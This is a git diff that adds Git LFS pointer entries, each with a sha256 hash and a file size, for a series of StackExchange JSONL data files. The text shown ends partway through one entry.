0000000000000000000000000000000000000000..82ec786ab333b945374ec0ff4f00b9fa99bffdc9 --- /dev/null +++ b/data/stackexchange/1-1/398_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:27f4086cdce153c527912e61c433ae2928e2da8753d662ad038f789d73176604 +size 36539003 diff --git a/data/stackexchange/1-1/399_2289.jsonl b/data/stackexchange/1-1/399_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8d6268705b61ebf4f283cef979da185de4a19ca0 --- /dev/null +++ b/data/stackexchange/1-1/399_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3e3138e116995b695fb4a223c0d8171dccf8b5feaadf5aa79db52e9c3d32076f +size 36348629 diff --git a/data/stackexchange/1-1/39_2289.jsonl b/data/stackexchange/1-1/39_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..36815d66a6292dcc1cfe8e132fa5710793466d60 --- /dev/null +++ b/data/stackexchange/1-1/39_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9fe3b080599613c4ec1623a30e104a08a7c2fab11d48603daebcf8bcf27e71ea +size 35087078 diff --git a/data/stackexchange/1-1/3_2289.jsonl b/data/stackexchange/1-1/3_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..26eebf7b4a3c024d86a2b33214ceedb121fb0970 --- /dev/null +++ b/data/stackexchange/1-1/3_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bbebb48ffa3841f8f89d30869246eb9b9ed91925b048f26ecc0f73020cd4bd87 +size 36299655 diff --git a/data/stackexchange/1-1/400_2289.jsonl b/data/stackexchange/1-1/400_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..74f4b42aadf19fd098e4ae342051dfca08c120e3 --- /dev/null +++ b/data/stackexchange/1-1/400_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0cb5526589dbd492d4bffd0d98202f7ef114be4116a7cb178b15c7d08845f741 +size 36577280 diff --git a/data/stackexchange/1-1/401_2289.jsonl b/data/stackexchange/1-1/401_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..66e8d84e5793a8b51cda6b4e72871d27c64f0e91 --- /dev/null +++ b/data/stackexchange/1-1/401_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f86aa1194807ae70f64d96780ce5bbb0189b6277ddb44e572d4921507e9d8962 +size 35884576 diff --git a/data/stackexchange/1-1/402_2289.jsonl b/data/stackexchange/1-1/402_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d87e0f96fd87806feb8603b6b02ea805dc741b4f --- /dev/null +++ b/data/stackexchange/1-1/402_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:078810d487936b5f89407d78a89e9c2369521d046f5eb1b8d87f31d19364545e +size 36233378 diff --git a/data/stackexchange/1-1/403_2289.jsonl b/data/stackexchange/1-1/403_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a665d50caca4f801aef5cbf07cb518e069d75b0b --- /dev/null +++ b/data/stackexchange/1-1/403_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ed82c26dc04e07d64fdf6c1874597c614996d9f175ff19ab4d6ed6bb3c73c782 +size 36363999 diff --git a/data/stackexchange/1-1/404_2289.jsonl b/data/stackexchange/1-1/404_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..74a573513ea87eb9bf855bb7194791a92917f111 --- /dev/null +++ b/data/stackexchange/1-1/404_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:602ec1df8bd167e99a0e2f7bc908379d924c42ca07a0703201af8d766938892b +size 36890265 diff --git a/data/stackexchange/1-1/405_2289.jsonl b/data/stackexchange/1-1/405_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..15ccfa1528559ec992947ef881e95cb893bbe3d0 --- /dev/null +++ b/data/stackexchange/1-1/405_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2baeb9a6ccf57f712770062c27c904b9da0c84c0266e84376985ca537312d7e1 +size 36203480 diff --git a/data/stackexchange/1-1/406_2289.jsonl b/data/stackexchange/1-1/406_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9f7fe94dfa6a257761d4365f0ba6bbe97e6c7216 --- /dev/null +++ b/data/stackexchange/1-1/406_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f08421b5d6416b1bf3c802587ea147f6426f83ed75740b7df1453c938172531d +size 36405416 diff --git a/data/stackexchange/1-1/407_2289.jsonl b/data/stackexchange/1-1/407_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3309b68abf4613577f44bb4716c18e095f563c60 --- /dev/null +++ b/data/stackexchange/1-1/407_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5def77de1d9030e3ece58b4ee8c3b5a6d1428e4eb15d2820a4dee9a0496d4993 +size 36472546 diff --git a/data/stackexchange/1-1/408_2289.jsonl b/data/stackexchange/1-1/408_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7acfdf8cccf7d799df5541258416203502b6c767 --- /dev/null +++ b/data/stackexchange/1-1/408_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:eebe27ee03407023929b72d26845680619ae5ea09e189e99596f446de9287f5a +size 35630146 diff --git a/data/stackexchange/1-1/409_2289.jsonl b/data/stackexchange/1-1/409_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2c8d13dd817229755a17e31c482cfa3afa1e0785 --- /dev/null +++ b/data/stackexchange/1-1/409_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4b52d9e0cbc4f711d9dc7d2a8aa57aa4a9d06207471db8663416892d92240427 +size 35780332 diff --git a/data/stackexchange/1-1/40_2289.jsonl b/data/stackexchange/1-1/40_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e325afa4e49a4bb0cf86387de4ddf17ee4edbdf2 --- /dev/null +++ b/data/stackexchange/1-1/40_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:944c9484360002ad76d50cc5d8723a4b5a5ea3377d8b3f993227263aac5eeacd +size 35504734 diff --git a/data/stackexchange/1-1/410_2289.jsonl b/data/stackexchange/1-1/410_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f81d48fc8b626ab0838e507fbdbe5653dd9b078c --- /dev/null +++ b/data/stackexchange/1-1/410_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d539c9617376834609650974bd334e04e86205e1a7a06970c848badde657e061 +size 36123260 diff --git a/data/stackexchange/1-1/411_2289.jsonl b/data/stackexchange/1-1/411_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7da26a8796018f396b6b067477106f0523e5e38a --- /dev/null +++ b/data/stackexchange/1-1/411_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:913e8299856607a0769843f89318d5768b1951a8888889ce960041532960d92a +size 36458219 diff --git a/data/stackexchange/1-1/412_2289.jsonl b/data/stackexchange/1-1/412_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5ce012292d510bedb6cda48afc04119e0ef07535 --- /dev/null +++ b/data/stackexchange/1-1/412_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5eef4ce7f2fe0c10f6ecd7801052295e8f130038560163eb249dd1c1483ad0c2 +size 36346234 diff --git a/data/stackexchange/1-1/413_2289.jsonl b/data/stackexchange/1-1/413_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c315b82c920b127a45bf179cbb29f2a08514252a --- /dev/null +++ b/data/stackexchange/1-1/413_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b784cb89ca83113e339d68be59121e9c0b627ab2ad735a68121ddb5aa2bc0216 +size 36445279 diff --git a/data/stackexchange/1-1/414_2289.jsonl b/data/stackexchange/1-1/414_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d9383e8196415f3507ffd2f941b9662938517201 --- /dev/null +++ b/data/stackexchange/1-1/414_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ade0dc54712e20cf09259b7a87c651d23de0abc29325cc3a7eef2a7e34d7e52a +size 36504503 diff --git a/data/stackexchange/1-1/415_2289.jsonl b/data/stackexchange/1-1/415_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4a568e7b0248a5bcfe57f10dd946ca28191f54e9 --- /dev/null +++ b/data/stackexchange/1-1/415_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:185c0b353824b5808e0b5e5c7e1da0320a702e18ba9b14399c26550fbf7e1d33 +size 36146646 diff --git a/data/stackexchange/1-1/416_2289.jsonl b/data/stackexchange/1-1/416_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..3c6f1b787117cc33154b4b2186ddfca4c7f6db73 --- /dev/null +++ b/data/stackexchange/1-1/416_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ab0946c18d56884b12b6e49fbebfb460b23464cc507bb28b9d85e3792edf0a4e +size 36781159 diff --git a/data/stackexchange/1-1/417_2289.jsonl b/data/stackexchange/1-1/417_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..60b8e266e098fffb8214efa54377a3d0bd957653 --- /dev/null +++ b/data/stackexchange/1-1/417_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:796f058f6ed1a6306a70a5e6fa965907698376bf5b46b0552a603710c123782b +size 36269601 diff --git a/data/stackexchange/1-1/418_2289.jsonl b/data/stackexchange/1-1/418_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4b9cd8cd8d344c95ec08dbd50646c2e487bfc864 --- /dev/null +++ b/data/stackexchange/1-1/418_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:037c1a447c8ec7a07cd74a178793801e3767af966a1071d6080fc549ffb28bbe +size 36180425 diff --git a/data/stackexchange/1-1/419_2289.jsonl b/data/stackexchange/1-1/419_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e236596789ad987c77f2fb7db2670517bbe74f7e --- /dev/null +++ b/data/stackexchange/1-1/419_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7442b9b52867542ab5b8f8512180714132f5781435dd73c81a86d870ec9b87dd +size 36327142 diff --git a/data/stackexchange/1-1/41_2289.jsonl b/data/stackexchange/1-1/41_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..441cd6cc18c9fa61783ef728e95f2bac630423ce --- /dev/null +++ b/data/stackexchange/1-1/41_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c3b91aab606388179ec196bb109b46b0bfc3a5858f1709bff4160a454da3a4c1 +size 35935873 diff --git a/data/stackexchange/1-1/420_2289.jsonl b/data/stackexchange/1-1/420_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cef0019da11295e6f94e126a9e1b8541df920764 --- /dev/null +++ b/data/stackexchange/1-1/420_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c00c2aa4e74dbb619d75664999d4c3f4c0c772f818dc541a2850608448fdabf7 +size 36667651 diff --git a/data/stackexchange/1-1/421_2289.jsonl b/data/stackexchange/1-1/421_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7521ee0b455045951dde5401175d3d01f7e8c217 --- /dev/null +++ b/data/stackexchange/1-1/421_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2afbc2c484532e531aae448ed6bb51e385f92af54efe7e4c41023b80061ea2ed +size 36268043 diff --git a/data/stackexchange/1-1/422_2289.jsonl b/data/stackexchange/1-1/422_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..81d62691569122a1dcc83d0259d94a563f68588c --- /dev/null +++ b/data/stackexchange/1-1/422_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:470f0ad70486b10069ca8e89b0edf5fea967ad8b22a2a37b11aea0cc6c0a2ae8 +size 37087833 diff --git a/data/stackexchange/1-1/423_2289.jsonl b/data/stackexchange/1-1/423_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..df3bb170008a6f7f0b9242f1292965af20d34bc5 --- /dev/null +++ b/data/stackexchange/1-1/423_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:76dad85a11e341389518c7aba17d1079929ad7ea2120048d3f39cb351e09079f +size 36568299 diff --git a/data/stackexchange/1-1/424_2289.jsonl b/data/stackexchange/1-1/424_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..828e6c859a3845add936a657ff83869d54758a2d --- /dev/null +++ b/data/stackexchange/1-1/424_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:efffd356d13c775d27f14b7d6c353c44f736de6d9067cbc57a8824afded227b3 +size 36632023 diff --git a/data/stackexchange/1-1/425_2289.jsonl b/data/stackexchange/1-1/425_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9ed616cda93138531941febecb4218dfba5025c4 --- /dev/null +++ b/data/stackexchange/1-1/425_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fa6c3dfb4e97a3a3c474f90848a878daec9b9b87066b9a923baf7f62106963c4 +size 36534511 diff --git a/data/stackexchange/1-1/426_2289.jsonl b/data/stackexchange/1-1/426_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4362d7be0faaa03f83d649c8919e928147eaddf6 --- /dev/null +++ b/data/stackexchange/1-1/426_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5d18d814a13b56f0ddef642346767f96c75d4d211e912f6a72d533c530d8bbc1 +size 36212720 diff --git a/data/stackexchange/1-1/427_2289.jsonl b/data/stackexchange/1-1/427_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..98d971578a9e40f6751bb82b9b1e76344cd87f37 --- /dev/null +++ b/data/stackexchange/1-1/427_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d697185193598a01698f048fd3fe72046c0bd15ad0cb09a73016657a4b0f3154 +size 36325019 diff --git a/data/stackexchange/1-1/428_2289.jsonl b/data/stackexchange/1-1/428_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..518558097700902884d0bbc7f0f6ea753e2e1dff --- /dev/null +++ b/data/stackexchange/1-1/428_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:99e75908e8c12b705f36600db38d47444b5cbdee3b81289c647b5bcaad2bd1c2 +size 36357555 diff --git a/data/stackexchange/1-1/429_2289.jsonl b/data/stackexchange/1-1/429_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c5c13de149927cf6c1b3769419d4cfe2546b347e --- /dev/null +++ b/data/stackexchange/1-1/429_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e3041f800db6d50a3c0489d44e0021b60a5e96c907f21a506de752b434e91ee4 +size 36418642 diff --git a/data/stackexchange/1-1/42_2289.jsonl b/data/stackexchange/1-1/42_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0a04f9fd27f60e6bcc691ce18b321eef7ff41326 --- /dev/null +++ b/data/stackexchange/1-1/42_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3d65ccf05312bcbba46257183d56825eb94107b134ba3efb2fe3e6a0f7b89ef7 +size 35808563 diff --git a/data/stackexchange/1-1/430_2289.jsonl b/data/stackexchange/1-1/430_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..33c67a8dc64c343be581a4caab838f53fd417a89 --- /dev/null +++ b/data/stackexchange/1-1/430_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f1b6dc5ef52a2387dfeec46c4f40b1037c9f76b1219076b7972837bc6579ff0f +size 36022594 diff --git a/data/stackexchange/1-1/431_2289.jsonl b/data/stackexchange/1-1/431_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..b43cd192250c2a36b239f52b248f71487131775c --- /dev/null +++ b/data/stackexchange/1-1/431_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:40c8738acac439f7a50db86cac63fbcb74e8336d22da53883727530e452e21e9 +size 36229787 diff --git a/data/stackexchange/1-1/432_2289.jsonl b/data/stackexchange/1-1/432_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c74f9c5f99156f18ceeafcf20fd15746ca60bc94 --- /dev/null +++ b/data/stackexchange/1-1/432_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:386d109da5b59eef484b93d8ba3143a7496739abf1bd6989b4a2618e1b09348d +size 36198311 diff --git a/data/stackexchange/1-1/433_2289.jsonl b/data/stackexchange/1-1/433_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e368c530cf6aa6d551c031d3ac0687b995fc0a2e --- /dev/null +++ b/data/stackexchange/1-1/433_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5cf6efa64cb00299e0753bf3dd9da939f535a60a0217a54839055c00b0080558 +size 35617144 diff --git a/data/stackexchange/1-1/434_2289.jsonl b/data/stackexchange/1-1/434_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..49a4c2dc1382e20553a1c5334b78b854596215d9 --- /dev/null +++ b/data/stackexchange/1-1/434_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7e5ecc3b947e55b3415058efaff2aff1a6ffb7deec03a8ebc74bda0e0138ba02 +size 35935751 diff --git a/data/stackexchange/1-1/435_2289.jsonl b/data/stackexchange/1-1/435_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4434e686acbe846ff9a911c57cc433d25d3d3965 --- /dev/null +++ b/data/stackexchange/1-1/435_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:05e58fbacef63f7e8e17ceb4b0c02c65f4dcd689dedaa157a60de6673fcb8f44 +size 36580903 diff --git a/data/stackexchange/1-1/436_2289.jsonl b/data/stackexchange/1-1/436_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e668bd5dff12a176b10410328dbe11f9c6555831 --- /dev/null +++ b/data/stackexchange/1-1/436_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3be182d9d6ca0d4fa364d29d023e294a55f68ebcbdafa8f55ae5a11baeb654c2 +size 36465106 diff --git a/data/stackexchange/1-1/437_2289.jsonl b/data/stackexchange/1-1/437_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..da66c5f2ce9b5016a32f287803ef12bc9aee19d2 --- /dev/null +++ b/data/stackexchange/1-1/437_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:574ca8feab082a2d64c2e7193a9748b94ac9aca065976531260a9aca57d750e9 +size 35984938 diff --git a/data/stackexchange/1-1/438_2289.jsonl b/data/stackexchange/1-1/438_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f8620c804789f5c1c6b2b3b552cd1f1203690938 --- /dev/null +++ b/data/stackexchange/1-1/438_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ce6ddc30612c76fdb493960e6050c8dfac2988c23c8a832c63bbd131a78ecdb2 +size 36149793 diff --git a/data/stackexchange/1-1/439_2289.jsonl b/data/stackexchange/1-1/439_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b4f40150ff0bf6d987cc1e5e52a5d87271039ba2 --- /dev/null +++ b/data/stackexchange/1-1/439_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:4005bcaadc42b313fdff55916ee7fd75af4a60300cee4aa25ab419993f1faede +size 36559510 diff --git a/data/stackexchange/1-1/43_2289.jsonl b/data/stackexchange/1-1/43_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f3387c95f35b11fa8c6fa69c20ea74e492ac0e53 --- /dev/null +++ b/data/stackexchange/1-1/43_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:aed827c7580c4ffcd3ae4a4ebe41bc1290fe6ddae908df6328387923e12b5190 +size 35832740 diff --git a/data/stackexchange/1-1/440_2289.jsonl b/data/stackexchange/1-1/440_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..77990dafd3d31f56a38877aadb088da735ffaae9 --- /dev/null +++ b/data/stackexchange/1-1/440_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:926e8cdc79b36f593d543b1a7fbb4e297c564a4e7d2b42247336faeb08c2f071 +size 36183495 diff --git a/data/stackexchange/1-1/441_2289.jsonl b/data/stackexchange/1-1/441_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bbde4be561c67a135f0047c069a3ee091c2f4b66 --- /dev/null +++ b/data/stackexchange/1-1/441_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:88891d0183cdb5592a7832b6b65cb0ac8135c4a3ab7c03a520335ac87f581333 +size 36790110 diff --git a/data/stackexchange/1-1/442_2289.jsonl b/data/stackexchange/1-1/442_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f7d8186991ba88280fba300f5ae007ce95f41e41 --- /dev/null +++ b/data/stackexchange/1-1/442_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4913bf1d150f56fe0cdb041384d7c69ce3325d02a04d6b06388bf8107d574053 +size 36598927 diff --git a/data/stackexchange/1-1/443_2289.jsonl b/data/stackexchange/1-1/443_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ae43c3fd81feadae235e3cc8b9724038636cd379 --- /dev/null +++ b/data/stackexchange/1-1/443_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d01bfaff9e009dcf5817a8118c92c665cfca1f49371abbc68ad037148c8e5a89 +size 35965967 diff --git a/data/stackexchange/1-1/444_2289.jsonl b/data/stackexchange/1-1/444_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5e6c4479b34f10d1af3ad6486a14f4c1b3a3edb1 --- /dev/null +++ b/data/stackexchange/1-1/444_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:398fac5898c4acfcd63837170aac9d15edada6c81d6e54be79a78d63b52714a8 +size 36028572 diff --git a/data/stackexchange/1-1/445_2289.jsonl b/data/stackexchange/1-1/445_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ea187775965f7a3084fbe59baf5f3857293d3ff3 --- /dev/null +++ b/data/stackexchange/1-1/445_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2400feb93a86fdb52cacfe63236a8849e7f0edd060857246223adfd6a6f5bb99 +size 36300113 diff --git a/data/stackexchange/1-1/446_2289.jsonl b/data/stackexchange/1-1/446_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a9285c9644664a3c4eb47c46b9ec6507df74f47a --- /dev/null +++ b/data/stackexchange/1-1/446_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:097929c36d2fd4e27e91ffc9a89e55cae112b41606f3473e88cd8a2cc37bfe10 +size 35866502 diff --git a/data/stackexchange/1-1/447_2289.jsonl b/data/stackexchange/1-1/447_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..69cc78a2b149e2cadf7d9958276d0dc91adc3710 --- /dev/null +++ b/data/stackexchange/1-1/447_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:93bdf03c5ce88c3103e0e8c04c1c5f89d77446e904e76bbc47693b17d5541378 +size 36409658 diff --git a/data/stackexchange/1-1/448_2289.jsonl b/data/stackexchange/1-1/448_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a64fad8ccbf7fdb1d42419009d864d61078084e9 --- /dev/null +++ b/data/stackexchange/1-1/448_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:75308c1d51e931bd9299c79753fe6ec2549f1bdcbe8aed82f0cada82998e504c +size 36646971 diff --git a/data/stackexchange/1-1/449_2289.jsonl b/data/stackexchange/1-1/449_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..38d56cbce95591cd3a40a030a7d3a1d4837e8ace --- /dev/null +++ b/data/stackexchange/1-1/449_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e67bf5b268f44a8a645ffb3b306d9e348334ca171294b3ee62f53c40e00303cf +size 36583859 diff --git a/data/stackexchange/1-1/44_2289.jsonl b/data/stackexchange/1-1/44_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4ccf3527ad46549b6d1258d1e788bfd09ce076a3 --- /dev/null +++ b/data/stackexchange/1-1/44_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1643b352dfa26d6e7bd6ea7c6504f6cda8ed1532618e46686c601d087b30d2f5 +size 35722458 diff --git a/data/stackexchange/1-1/450_2289.jsonl b/data/stackexchange/1-1/450_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bd66ef2eae2a7bf02b32295e7e9e473bc0d17886 --- /dev/null +++ b/data/stackexchange/1-1/450_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:67f317f5c4049780fe8298669ec34e30046633485fbed3aafbac3d4037510060 +size 39739146 diff --git a/data/stackexchange/1-1/451_2289.jsonl b/data/stackexchange/1-1/451_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..19832a13331af2ca46381d106952cd1fa9052952 --- /dev/null +++ b/data/stackexchange/1-1/451_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:520de81191e93ef5c50b0af2f91624394df906d067b53757b5ff69a8b4672f22 +size 40111133 diff --git a/data/stackexchange/1-1/452_2289.jsonl b/data/stackexchange/1-1/452_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ef7be1d0f750dcd7a3f53c5fb71205a807348020 --- /dev/null +++ b/data/stackexchange/1-1/452_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f72027ab3fc38fc2e98676887d77ef59591ad386ad469991c1f204cdfbc6cc14 +size 40600850 diff --git a/data/stackexchange/1-1/453_2289.jsonl b/data/stackexchange/1-1/453_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..73b90a89850b8ed362507898eb1c9a5efd1d3dcf --- /dev/null +++ b/data/stackexchange/1-1/453_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:07d7fa9dc9ddb0b7ab8eef3b825dfe3f7e6becb6c0de315449cfedfd20e2032d +size 39757487 diff --git a/data/stackexchange/1-1/454_2289.jsonl b/data/stackexchange/1-1/454_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..856593a11b0489f9e1bc50b9f0a872303ba3f2b6 --- /dev/null +++ b/data/stackexchange/1-1/454_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:7fe97460065071a6b2e6d49134dc7d6034effc1d6436dfbbe659dc3178d27d3d +size 39776268 diff --git a/data/stackexchange/1-1/455_2289.jsonl b/data/stackexchange/1-1/455_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a85306e7deede2f163429de895db606f3bc1bc68 --- /dev/null +++ b/data/stackexchange/1-1/455_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:94fd980680872256659786272b82fc9b0c94dd94094a33d1483a85941975da8f +size 40816868 diff --git a/data/stackexchange/1-1/456_2289.jsonl b/data/stackexchange/1-1/456_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9aadec33a9ae31a9a1146b61c38a8224f44312de --- /dev/null +++ b/data/stackexchange/1-1/456_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:45325005d0da92a9499fefd22fc9f6194da1dbbb80a161751c6aa99175f95537 +size 39728763 diff --git a/data/stackexchange/1-1/457_2289.jsonl b/data/stackexchange/1-1/457_2289.jsonl new file mode 100644 index 